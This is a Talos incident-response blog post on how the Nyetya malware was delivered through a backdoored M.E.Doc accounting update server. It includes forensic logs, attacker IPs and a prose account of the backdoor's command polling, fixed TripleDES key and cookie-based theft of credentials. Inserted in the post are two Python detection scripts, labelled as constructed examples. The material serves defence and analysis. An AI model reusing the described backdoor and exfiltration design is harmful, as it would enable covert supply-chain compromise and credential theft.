&amp;nbsp;With this recent history in mind, we were immediately concerned that there was more to this story than just another ransomware attack.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-WPWy4CVApVw/WV0Vn3dqn9I/AAAAAAAABQU/VMA6gRfjBdQwuy9i3YMEawNZYaffZuuhACK4BGAYYCw/s1600/Screenshot%2B2017-07-04%2B11.03.09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="https://1.bp.blogspot.com/-WPWy4CVApVw/WV0Vn3dqn9I/AAAAAAAABQU/VMA6gRfjBdQwuy9i3YMEawNZYaffZuuhACK4BGAYYCw/s400/Screenshot%2B2017-07-04%2B11.03.09.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Early on it became clear that, while a majority of the early events were in Ukraine, the malware was infecting organizations that didn’t immediately have any known connection to the country. &amp;nbsp;Because of the scale of the event, Talos initiated an internal response management system called TaCERS (Talos Critical Event Response System) and began the research and response process. &amp;nbsp;TaCERS divides up activities into intelligence, telemetry analysis, reverse engineering, communications and detection research. &amp;nbsp;Talos researchers and engineers from around the world came together to address this threat.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Based on endpoint telemetry, it was clear that a Ukrainian accounting software package called “M.E.Doc” was at the center of activity. Like WannaCry, there were reports of an email vector. &amp;nbsp;This is most likely because some of the earliest infected machines had concurrent Lokibot infections with indications of an email vector for that malware. 
After careful research, Talos concluded that for the delivery of the Nyetya malware, all installations came through the M.E.Doc update system.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;M.E.Doc is a widely deployed accounting package created by a Ukrainian company named Intellect Service and is used to interact with Ukrainian tax systems. &amp;nbsp;At this point we were in a position to reach out to M.E.Doc directly and offer assistance.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;M.E.Doc was quick to accept an offer of assistance. &amp;nbsp;As part of Cisco’s global response to this event, two incident response specialists from the Advanced Services group arrived in Ukraine on the evening of June 29th and an additional incident response specialist supported the investigation from the UK. &amp;nbsp;M.E.Doc was exceptionally open in arranging access to engineers and administrators who walked the team through the system and provided access to log files and code. &amp;nbsp;They also agreed to share the results of our investigation for the purposes of this report.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;In every Cisco incident response investigation, anywhere in the world, a dedicated Talos resource is made available to the incident response team to coordinate intelligence analysis, reverse engineering escalations and telemetry analysis activities. 
&amp;nbsp;The two teams work together constantly, and that experience was put to full use in this investigation.&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;Early in the investigation, a web shell was discovered at http://www.me-doc[.]com[.]ua/TESTUpdate/medoc_online.php. &amp;nbsp;The timestamp in the file was May 31 14:45 2017. Our analysis shows the web shell to be a slightly modified version of the open source PHP web shell PAS. The web shell is stored in an encrypted form and requires a passphrase set in an HTTP POST variable to decrypt. The decryption of the shell shows a fully featured PAS web shell.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-7-4vmF7l30k/WV0WioQoSPI/AAAAAAAABQc/yhEZCUY56hMp7uYXTA4POTb2dBNuahsnQCK4BGAYYCw/s1600/nyetya_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://2.bp.blogspot.com/-7-4vmF7l30k/WV0WioQoSPI/AAAAAAAABQc/yhEZCUY56hMp7uYXTA4POTb2dBNuahsnQCK4BGAYYCw/s400/nyetya_1.png" width="375" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;As the incident response team extracted logs and additional forensic data, it was uploaded to Talos. &amp;nbsp;This started a 24-hour cycle where at around 10am EDT, when it was evening in Ukraine, the Cisco incident response team would brief Talos on their findings and new data. &amp;nbsp;Then at 3am EDT, as Ukraine was getting to work, Talos would brief the Cisco incident response team on their overnight findings.&lt;/div&gt;&lt;div&gt;Almost immediately, indications of problems were found. 
&amp;nbsp;In the July 1st briefing, Talos identified key evidence in the logs:&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;table border="1" style="width: 100%;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td width="15%"&gt;Time&lt;/td&gt;&lt;td&gt;Log entry&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;8:57:46 AM&lt;/td&gt;&lt;td&gt;usc-cert sshd[23183]: subsystem request for sftp&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;8:59:09 AM&lt;/td&gt;&lt;td&gt;usc-cert su: BAD SU &amp;lt;redacted&amp;gt; to root on /dev/pts/0&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;8:59:14 AM&lt;/td&gt;&lt;td&gt;usc-cert su: &amp;lt;redacted&amp;gt; to root on /dev/pts/0&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;9:09:20 AM&lt;/td&gt;&lt;td&gt;[emerg] 23319#0: unknown directive "&amp;lt;feff&amp;gt;" in /usr/local/etc/nginx/nginx.conf:3&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;9:11:59 AM&lt;/td&gt;&lt;td&gt;[emerg] 23376#0: location "/" is outside location "\.(ver|txt|exe|upd|rtf|cmnt)$" in /usr/local/etc/nginx/nginx.conf:136&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;An unknown actor had stolen the credentials of an administrator at M.E.Doc. &amp;nbsp;They logged into the server, acquired root privileges and then began modifying the configuration file for the NGINX web server. &amp;nbsp;We were unable to recover the nginx.conf file, as it was subsequently overwritten, but additional log files were important in understanding what was changed. 
&amp;nbsp;What we found were thousands of errors that looked like this:&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;[error] 23401#0: *374685644 upstream timed out (60: Operation timed out) while connecting to upstream, client: &amp;lt;REDACTED&amp;gt;, server: upd.me-doc.com.ua, request: "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1", upstream: "http://176.31.182[.]167:80/last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74", host: "upd.me-doc.com.ua"&lt;/blockquote&gt;The NGINX server had been reconfigured so that any traffic to upd.me-doc.com.ua would be proxied through the update server and to a host in the OVH IP space with an IP of 176.31.182.167. &amp;nbsp;Subsequent investigation found that this server was operated by a reseller, thcservers.com, and that the server had been wiped the same day at 7:46 PM UTC.&lt;br /&gt;&lt;br /&gt;When we compare the time of the first and last upstream error messages on the server to our in-field endpoint telemetry, we find that they bracket the beginning and the end of the active infection phase of the event. &amp;nbsp;The initial log message was at 9:11:59 UTC and the last message was seen at 12:31:12 UTC. &amp;nbsp;In our telemetry we see no new organizations infected outside of this timeframe.&lt;br /&gt;&lt;br /&gt;We found one other piece of forensic evidence showing that the event concluded on or around 12:30 PM UTC. &amp;nbsp;The file timestamp for nginx.conf at the time we analyzed the servers was Jun 27th, 12:33 PM UTC. &amp;nbsp;The actor had returned the NGINX configuration to its original state at this time. 
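The log triage described above, as an added example that is not Talos or M.E.Doc code: the script parses nginx error-log lines of the shape quoted above, flags any proxied upstream that is not on an allow-list of the update server's legitimate backends, and reports the first and last timestamps per rogue host, which is the same bracketing of the active infection window described in the text. The sample lines, the 10.10.10.10 backend and the allow-list are constructed.

```python
"""Bracket a proxy hijack window from nginx error-log lines.

Added example for the M.E.Doc investigation above; not Talos or M.E.Doc code.
The sample lines, the error-log layout they follow and the allow-list of
legitimate backends (10.10.10.10) are constructed for illustration.
"""
import re
from datetime import datetime

# Constructed sample log. Lines 1 and 3 are modelled on the "upstream timed
# out" message quoted in the post (same rogue upstream and rnd value); the
# 10.10.10.10 backend and the open() failure are invented.
SAMPLE_ERROR_LOG = """\
2017/06/27 09:11:59 [error] 23401#0: *374685644 upstream timed out (60: Operation timed out) while connecting to upstream, client: REDACTED, server: upd.me-doc.com.ua, request: "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1", upstream: "http://176.31.182.167:80/last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74", host: "upd.me-doc.com.ua"
2017/06/27 10:02:10 [error] 23401#0: *374690001 upstream timed out (60: Operation timed out) while connecting to upstream, client: REDACTED, server: upd.me-doc.com.ua, request: "GET /last.ver?rnd=aaaa HTTP/1.1", upstream: "http://10.10.10.10:80/last.ver?rnd=aaaa", host: "upd.me-doc.com.ua"
2017/06/27 12:31:12 [error] 23401#0: *374700002 upstream timed out (60: Operation timed out) while connecting to upstream, client: REDACTED, server: upd.me-doc.com.ua, request: "GET /last.ver?rnd=bbbb HTTP/1.1", upstream: "http://176.31.182.167:80/last.ver?rnd=bbbb", host: "upd.me-doc.com.ua"
2017/06/27 12:40:00 [error] 23401#0: *374700009 open() "/usr/local/www/x.upd" failed (2: No such file or directory), client: REDACTED, server: upd.me-doc.com.ua, request: "GET /x.upd HTTP/1.1", host: "upd.me-doc.com.ua"
"""

# nginx error-log prefix: "YYYY/MM/DD HH:MM:SS [level] pid#tid: *cid message"
LINE_RE = re.compile(r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(\w+)\] (.*)$")
# Host (or IP) of the upstream nginx tried to reach, as quoted in the message.
UPSTREAM_RE = re.compile(r'upstream: "https?://([^/:]+)')


def parse_upstream_errors(log_text):
    """Yield (timestamp, upstream_host) for every line that names an upstream."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        u = UPSTREAM_RE.search(m.group(3))
        if not u:
            continue  # not a proxy error (e.g. the open() failure above)
        ts = datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S")
        yield ts, u.group(1)


def find_rogue_upstreams(log_text, allowed_upstreams):
    """Return {host: (first_seen, last_seen, count)} for upstreams that are
    not on the allow-list. first_seen and last_seen bracket the window in
    which the server was proxying to that host, which is what Talos used
    to bound the active infection phase."""
    windows = {}
    for ts, host in parse_upstream_errors(log_text):
        if host in allowed_upstreams:
            continue
        first, last, count = windows.get(host, (ts, ts, 0))
        windows[host] = (min(first, ts), max(last, ts), count + 1)
    return windows


def report(windows):
    """Render one line per rogue upstream, including the window length."""
    lines = []
    for host, (first, last, count) in sorted(windows.items()):
        lines.append(
            "rogue upstream %s: %d errors between %s and %s (%s)"
            % (host, count, first.isoformat(sep=" "), last.isoformat(sep=" "), last - first)
        )
    return lines


if __name__ == "__main__":
    # 10.10.10.10 stands in for the update server's legitimate backend.
    for line in report(find_rogue_upstreams(SAMPLE_ERROR_LOG, {"10.10.10.10"})):
        print(line)
```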
&amp;nbsp;The only other indicator to share is a Latvian IP address that disconnected from the system at 2:11:07 PM UTC:&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;Received disconnect from 159.148.186.214: 11: FlowSshClientSession: disconnected on user's request&lt;/blockquote&gt;M.E.Doc confirms that neither the OVH server nor the Latvian IP address has any association with M.E.Doc.&lt;br /&gt;&lt;br /&gt;At this point we understood that the actor in question had access to much of the network and many of the systems of M.E.Doc through compromised credentials. &amp;nbsp;The questions remaining were: &amp;nbsp;What were they doing with control of the upgrade server? &amp;nbsp;How were they delivering the malicious software?&lt;br /&gt;&lt;br /&gt;While we didn’t know it at the time, we can now confirm &lt;a href="https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/"&gt;ESET’s research&lt;/a&gt; into the backdoor that had been inserted into the M.E.Doc software. &amp;nbsp;The .NET code in ZvitPublishedObjects.dll had been modified on multiple occasions to allow a malicious actor to gather data and download and execute arbitrary code:&lt;br /&gt;&lt;br /&gt;&lt;table border="1"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Date&lt;/td&gt;&lt;td&gt;M.E.Doc Update Version&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;4/14/2017&lt;/td&gt;&lt;td&gt;10.01.175-10.01.176&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;5/15/2017&lt;/td&gt;&lt;td&gt;10.01.180-10.01.181&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;6/22/2017&lt;/td&gt;&lt;td&gt;10.01.188-10.01.189&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Looking further back in the logs provided by M.E.Doc, we could see the same “upstream” activity on June 22nd. 
&amp;nbsp;Unfortunately, we do not have logs available for May or April, but it is reasonable to assume similar behavior occurred through those dates as well.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-6k2E9WGPhIU/WV1GNRjeJPI/AAAAAAAABSs/9-7vo7If2ZUOx2ehtLjoZAcVJv9iGHGZwCK4BGAYYCw/s1600/Nyetya%2BBlog%2BPost%2B1%25282%2529.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://3.bp.blogspot.com/-6k2E9WGPhIU/WV1GNRjeJPI/AAAAAAAABSs/9-7vo7If2ZUOx2ehtLjoZAcVJv9iGHGZwCK4BGAYYCw/s1600/Nyetya%2BBlog%2BPost%2B1%25282%2529.jpg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Timeline&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3&gt;ZvitPublishedObjects.dll Backdoor Analysis&lt;/h3&gt;&lt;div&gt;&lt;div&gt;The backdoor was added to the ZvitPublishedObjects.Server.UpdaterUtils.IsNewUpdate function in ZvitPublishedObjects.dll:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-NGkaaYMom5M/WV0aZvbKUeI/AAAAAAAABQk/hwvdSAzeIKMtANeCDcvUXnSfRe8ghFRhgCK4BGAYYCw/s1600/IsNewUpdate2.PNG" imageanchor="1"&gt;&lt;img border="0" height="312" src="https://4.bp.blogspot.com/-NGkaaYMom5M/WV0aZvbKUeI/AAAAAAAABQk/hwvdSAzeIKMtANeCDcvUXnSfRe8ghFRhgCK4BGAYYCw/s640/IsNewUpdate2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Between lines 278 and 279 on the left, we can see on the right that code was added to retrieve every organization’s EDRPOU and name. 
Then it creates a new MeCom object and a thread for it which will contact http://upd.me-doc[.]com.ua/last.ver?rnd=&amp;lt;GUID&amp;gt; every 2 minutes. It will also send any replies to this URL.&lt;br /&gt;&lt;br /&gt;If a proxy has been configured, when the MeCom object is created at line 288 on the right, it proceeds to retrieve the proxy’s host, port, username and password:&lt;/div&gt;&lt;div&gt;&lt;a href="http://1.bp.blogspot.com/-v_D9WCb4Xgo/WV0amkynVwI/AAAAAAAABQs/CFuBb0bxAeQmGKeuhNVNrfH0f_N-ZiSSACK4BGAYYCw/s1600/MeComProxy.PNG" imageanchor="1"&gt;&lt;img border="0" height="308" src="https://1.bp.blogspot.com/-v_D9WCb4Xgo/WV0amkynVwI/AAAAAAAABQs/CFuBb0bxAeQmGKeuhNVNrfH0f_N-ZiSSACK4BGAYYCw/s640/MeComProxy.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;It then retrieves the SMTP host, username, password and email address for every organization in the application’s database:&lt;/div&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-C0AXgdyKOLU/WV0auiJampI/AAAAAAAABQ0/9JO5IYtr7WAHHRxaFyG8KB2tsiPwugxWgCK4BGAYYCw/s1600/MeComySMTP.PNG" imageanchor="1"&gt;&lt;img border="0" height="310" src="https://4.bp.blogspot.com/-C0AXgdyKOLU/WV0auiJampI/AAAAAAAABQ0/9JO5IYtr7WAHHRxaFyG8KB2tsiPwugxWgCK4BGAYYCw/s640/MeComySMTP.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;It also writes the previously collected proxy info to a registry key: HKCU\SOFTWARE\WC. It stores the proxy username and password in the “Cred” subkey and the full proxy information in “Prx”.&lt;br /&gt;&lt;br /&gt;At line 294 in IsNewUpdate is a call to meCom.CreateMeainThread. &amp;nbsp;The code creates a thread that performs the “MainAction”. This thread will continuously query the request URL (http://upd.me-doc[.]com.ua/last.ver?rnd=&amp;lt;GUID&amp;gt;) looking for commands and will then start a new thread per command to execute, waiting a maximum of 10 minutes for the thread to complete. 
It will then send back the result of the thread to the response URL, which in this case is the same as the request URL: http://upd.me-doc[.]com.ua/last.ver?rnd=&amp;lt;GUID&amp;gt;.&lt;br /&gt;&lt;br /&gt;The GetCommandsAndPeriod function will retrieve the commands from the web request:&lt;/div&gt;&lt;div&gt;&lt;a href="http://1.bp.blogspot.com/-RD1sZLH5Y-0/WV0a6mnLCQI/AAAAAAAABQ8/17E0nvkh5OEFNx7s5g5dJHWMZP1vEaf4wCK4BGAYYCw/s1600/MeComGetCommands.PNG" imageanchor="1"&gt;&lt;img border="0" height="274" src="https://1.bp.blogspot.com/-RD1sZLH5Y-0/WV0a6mnLCQI/AAAAAAAABQ8/17E0nvkh5OEFNx7s5g5dJHWMZP1vEaf4wCK4BGAYYCw/s640/MeComGetCommands.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;When sending the request, it will pass along in cookies the EDRPOU and the username that the program is running as. From the response, it will read the first 8 bytes as the initialization vector for the encryption. The rest of the data is encrypted with TripleDES using a 24-character key consisting of \x00 to \x17 (i.e. characters 0 to 23). It will decrypt, decompress and deserialize the commands it has to execute. It will also retrieve information on how long it should wait until the next time it goes to ask for commands (this was originally set to 2 minutes when the object was created).&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://1.bp.blogspot.com/-IE03IctR7uE/WV0bK_TCcuI/AAAAAAAABRE/xoJxe9b-rks0-R09EImYtXjq3jF2aV08wCK4BGAYYCw/s1600/MeComSendAnswer.PNG" imageanchor="1"&gt;&lt;img border="0" height="492" src="https://1.bp.blogspot.com/-IE03IctR7uE/WV0bK_TCcuI/AAAAAAAABRE/xoJxe9b-rks0-R09EImYtXjq3jF2aV08wCK4BGAYYCw/s640/MeComSendAnswer.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;SendAnswer will send multiple web requests with a maximum of 2048 bytes each, with the result of the executed command stored in cookies. 
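Detection logic for the beacon behaviour described above (the 2-minute poll of last.ver?rnd= and the command results carried in cookies), as an added example that is not Talos or M.E.Doc code. It assumes a constructed access-log format that also records the byte length of the Cookie header, constructed client addresses 10.0.0.7 to 10.0.0.9, and that legitimate update clients may fetch last.ver too, so the score rests on the steady period and the oversized cookies rather than on the path alone.

```python
"""Score web clients for the ZvitPublishedObjects.dll beacon pattern.

Added example for the backdoor analysis above; not Talos or M.E.Doc code.
It assumes a constructed nginx log_format of the shape
  $remote_addr [$time_local] "$request" $status cookie_bytes
where cookie_bytes is the length of the Cookie header, and constructed
client addresses 10.0.0.7, 10.0.0.8 and 10.0.0.9.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed access log, not real traffic. 10.0.0.7 polls every ~2 minutes
# and twice sends a 2048-byte cookie (the SendAnswer chunk size); 10.0.0.8
# polls at irregular gaps; 10.0.0.9 has too few requests to score.
SAMPLE_ACCESS_LOG = """\
10.0.0.7 [27/Jun/2017:09:12:01 +0000] "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1" 200 41
10.0.0.7 [27/Jun/2017:09:14:01 +0000] "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1" 200 41
10.0.0.7 [27/Jun/2017:09:16:02 +0000] "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1" 200 2048
10.0.0.7 [27/Jun/2017:09:18:01 +0000] "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1" 200 2048
10.0.0.7 [27/Jun/2017:09:20:01 +0000] "GET /last.ver?rnd=1b2eb092215b49f5b1d691b5c38e3a74 HTTP/1.1" 200 41
10.0.0.8 [27/Jun/2017:09:00:00 +0000] "GET /last.ver?rnd=aaaa HTTP/1.1" 200 41
10.0.0.8 [27/Jun/2017:09:02:00 +0000] "GET /last.ver?rnd=aaaa HTTP/1.1" 200 41
10.0.0.8 [27/Jun/2017:09:12:00 +0000] "GET /last.ver?rnd=aaaa HTTP/1.1" 200 41
10.0.0.8 [27/Jun/2017:09:13:00 +0000] "GET /last.ver?rnd=aaaa HTTP/1.1" 200 41
10.0.0.8 [27/Jun/2017:10:03:00 +0000] "GET /last.ver?rnd=aaaa HTTP/1.1" 200 41
10.0.0.9 [27/Jun/2017:08:00:00 +0000] "GET /last.ver?rnd=cccc HTTP/1.1" 200 41
10.0.0.9 [27/Jun/2017:16:00:00 +0000] "GET /last.ver?rnd=cccc HTTP/1.1" 200 41
"""

ACCESS_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)$')
BEACON_PREFIX = "/last.ver?rnd="  # request URL shape used by the backdoor


def parse_access(log_text):
    """Yield (client_ip, timestamp, path, cookie_bytes) per well-formed line."""
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        yield m.group(1), ts, m.group(4), int(m.group(6))


def within(value, target, tolerance):
    """True when value lies within target*tolerance of target."""
    return not abs(value - target) > target * tolerance


def score_clients(log_text, period_s=120, tolerance=0.15, min_hits=4, cookie_limit=1024):
    """Per client with at least min_hits beacon-shaped requests, report the
    median request gap, whether it matches the backdoor's default 2-minute
    period with little jitter, and how many requests carried a Cookie header
    larger than cookie_limit bytes (SendAnswer chunks run up to 2048)."""
    stamps = defaultdict(list)
    large = defaultdict(int)
    for ip, ts, path, cookie_bytes in parse_access(log_text):
        if not path.startswith(BEACON_PREFIX):
            continue
        stamps[ip].append(ts)
        if cookie_bytes > cookie_limit:
            large[ip] += 1
    findings = {}
    for ip, times in stamps.items():
        if min_hits > len(times):
            continue  # too few requests to judge periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median_gap = statistics.median(gaps)
        steady = all(within(g, median_gap, tolerance) for g in gaps)
        periodic = within(median_gap, period_s, tolerance)
        findings[ip] = {
            "hits": len(times),
            "median_gap_s": median_gap,
            "large_cookie_requests": large[ip],
            "suspicious": periodic and steady,
        }
    return findings


if __name__ == "__main__":
    for ip, finding in sorted(score_clients(SAMPLE_ACCESS_LOG).items()):
        print(ip, finding)
```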
It will encrypt this data the same way as the received commands, using a random 8-byte IV and the same 24-character key (\x00 to \x17).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;These are the encryption and decryption functions:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/-TeBJNva-obo/WV0bYd_iQeI/AAAAAAAABRM/tkhvmHCqkQsYJPJc_S8bMgTi7b3l7J-1ACK4BGAYYCw/s1600/ZvitCryptoIV.PNG" imageanchor="1"&gt;&lt;img border="0" height="340" src="https://3.bp.blogspot.com/-TeBJNva-obo/WV0bYd_iQeI/AAAAAAAABRM/tkhvmHCqkQsYJPJc_S8bMgTi7b3l7J-1ACK4BGAYYCw/s640/ZvitCryptoIV.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/-Ujh3Wp3EMRU/WV0bd_pMHMI/AAAAAAAABRU/XbtTPEp-WwYN_TQjA7FAAY0wgAxzvJmKwCK4BGAYYCw/s1600/ZvitEncrypt.PNG" imageanchor="1"&gt;&lt;img border="0" height="328" src="https://3.bp.blogspot.com/-Ujh3Wp3EMRU/WV0bd_pMHMI/AAAAAAAABRU/XbtTPEp-WwYN_TQjA7FAAY0wgAxzvJmKwCK4BGAYYCw/s640/ZvitEncrypt.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://3.bp.blogspot.com/-Yy5IsrJ3m6I/WV0bi-4symI/AAAAAAAABRc/jw9bCg5s2IYjfZ7qlZNzcPXame_9qWW6wCK4BGAYYCw/s1600/ZvitDecrypt.PNG" imageanchor="1"&gt;&lt;img border="0" height="336" src="https://3.bp.blogspot.com/-Yy5IsrJ3m6I/WV0bi-4symI/AAAAAAAABRc/jw9bCg5s2IYjfZ7qlZNzcPXame_9qWW6wCK4BGAYYCw/s640/ZvitDecrypt.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Finally, the Worker object (see Line 372 of MainFunction) handles executing the commands. 
There are a total of 6 commands that Worker can execute.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-MoPjcRgmfzg/WV0cSXpfLJI/AAAAAAAABRs/kcRHFl-xPXMhVq2ILFbmJxaAz2UUG3LBACK4BGAYYCw/s1600/WorkerAutoPayload1.PNG" imageanchor="1"&gt;&lt;img border="0" height="430" src="https://4.bp.blogspot.com/-MoPjcRgmfzg/WV0cSXpfLJI/AAAAAAAABRs/kcRHFl-xPXMhVq2ILFbmJxaAz2UUG3LBACK4BGAYYCw/s640/WorkerAutoPayload1.PNG" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;This appears to be the mechanism used for delivering the Nyetya malware. &amp;nbsp;The command line arguments perfectly match what was observed in endpoint telemetry when M.E.Doc machines executed the initial sample.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-fSEchhHvCSY/WV1GW9aLJcI/AAAAAAAABS0/zKMKcY6SZKUZ0EEHe8htkIFMwOj-3aHfgCK4BGAYYCw/s1600/Nyetya%2BBlog%2BPost%2B2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="622" src="https://2.bp.blogspot.com/-fSEchhHvCSY/WV1GW9aLJcI/AAAAAAAABS0/zKMKcY6SZKUZ0EEHe8htkIFMwOj-3aHfgCK4BGAYYCw/s640/Nyetya%2BBlog%2BPost%2B2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Detail of Commands&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;h3&gt;What Now?&lt;/h3&gt;&lt;div&gt;&lt;div&gt;First we need to put together everything we know. &amp;nbsp;In the past Talos has observed an actor specifically targeting Ukrainian institutions attempt to use the BlackEnergy wiper malware and, when that attempt was blocked, fall back to using a ransomware variant as an acceptable replacement for a wiper. 
&amp;nbsp;We’ve also already documented in &lt;a href="http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html"&gt;our previous blog&lt;/a&gt; that “Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated.” &amp;nbsp;Finally, now that we can confirm that M.E.Doc was the installation vector, we can assess that the targets for this attack were Ukraine and those organizations that chose to conduct business with Ukraine.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Our Threat Intelligence and Interdiction team is concerned that the actor in question burned a significant capability in this attack. &amp;nbsp;They have now compromised both their backdoor in the M.E.Doc software and their ability to manipulate the server configuration in the update server.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;In short, the actor has given up the ability to deliver arbitrary code to the 80% of UA businesses that use M.E.Doc as their accounting software, along with any multinational corporations that leveraged the software. &amp;nbsp;This is a significant loss in operational capability, and the Threat Intelligence and Interdiction team assesses with moderate confidence that it is unlikely that they would have expended this capability without confidence that they now have or can easily obtain similar capability in target networks of highest priority to the threat actor.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Based on this, Talos is advising that any organization with ties to Ukraine treat software like M.E.Doc and systems in Ukraine with extra caution since they have been shown to be targeted by advanced threat actors. 
